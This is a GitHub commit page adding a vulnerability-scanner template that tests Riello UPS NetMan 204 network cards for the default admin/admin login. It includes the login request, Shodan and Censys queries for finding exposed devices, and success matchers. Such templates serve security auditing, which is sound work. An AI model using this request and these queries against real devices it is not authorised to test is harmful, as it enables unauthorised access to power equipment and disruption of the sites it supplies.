Merge pull request #7390 from mabdullah22/netman

Add Netman Default Login
patch-1
Dhiyaneshwaran 2023-06-14 12:56:14 +05:30 committed by GitHub
commit 2613eed41d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 52 additions and 0 deletions

View File

@ -1378,6 +1378,16 @@
"website": "https://the-empire.systems",
"email": ""
}
},
{
"author": "mabdullah22",
"links": {
"github": "https://www.github.com/maabdullah22",
"twitter": "https://twitter.com/0x416264",
"linkedin": "",
"website": "",
"email": ""
}
}
]

View File

@ -0,0 +1,42 @@
id: netman-default-login
info:
name: Riello UPS NetMan 204 Network Card - Default Login
author: mabdullah22
severity: high
description: |
Default logins on Riello UPS NetMan 204 is used. Attacker can access to UPS and attacker can manipulate the UPS settings to disrupt the onsite systems.
reference:
- https://www.riello-ups.com/
metadata:
verified: "true"
shodan-query: title:"Netman"
censys-query: services.http.response.body:"Netman204"
max-request: 1
tags: default-login,netman
requests:
- raw:
- |
GET /cgi-bin/login.cgi?username={{username}}&password={{password}} HTTP/1.1
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"response": "ok",'
- '"message": "Welcome."'
condition: and
- type: status
status:
- 200